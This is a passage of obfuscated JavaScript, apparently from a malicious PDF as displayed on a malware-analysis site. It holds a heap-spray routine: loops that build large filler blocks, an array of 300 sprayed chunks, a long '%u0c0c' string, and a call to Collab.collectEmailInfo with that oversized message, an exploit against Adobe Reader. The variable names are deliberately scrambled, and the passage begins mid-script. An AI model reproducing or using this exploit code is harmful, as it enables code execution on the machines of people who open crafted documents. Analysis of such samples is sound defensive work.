(fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length<MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV) fhwpbcVvadNUtmvSVbaNLbnkoRXYJU+=fhwpbcVvadNUtmvSVbaNLbnkoRXYJU; sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU["substring"](0, MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV); sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU["substring"](0, fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length-MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV); while(sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi.length+MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV < 0x40000) sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl; var dakslfjaljfklasfjasdlk = Array; afsdfasfcxzfcsdagfdgfgfasdfafacadf = new dakslfjaljfklasfjasdlk(); for(afdadfcznzmzhczjncafahfjkasdhfjkdfh=0;afdadfcznzmzhczjncafahfjkasdhfjkdfh<300;afdadfcznzmzhczjncafahfjkasdhfjkdfh++) afsdfasfcxzfcsdagfdgfgfasdfafacadf[afdadfcznzmzhczjncafahfjkasdhfjkdfh] = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi + JpeKAFDjrTfdKIERlblJLAmY; var iJCYnMqYfdUqJybccHmtjpgocdxIgC = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x75\x30c\x30c\x25\x750c0c"); while(iJCYnMqYfdUqJybccHmtjpgocdxIgC.length < 0x1200) iJCYnMqYfdUqJybccHmtjpgocdxIgC =iJCYnMqYfdUqJybccHmtjpgocdxIgC+iJCYnMqYfdUqJybccHmtjpgocdxIgC; var adfafasdffsfsdfdfvcvv = Collab; var dfzfddfgfgasfasddcacs = this; dfzfddfgfgasfasddcacs.collabStore = adfafasdffsfsdfdfvcvv["collectEmailInfo"]({subj: "",msg: iJCYnMqYfdUqJybccHmtjpgocdxIgC});

Open this report in the interactive analyzer, or submit your own file for analysis.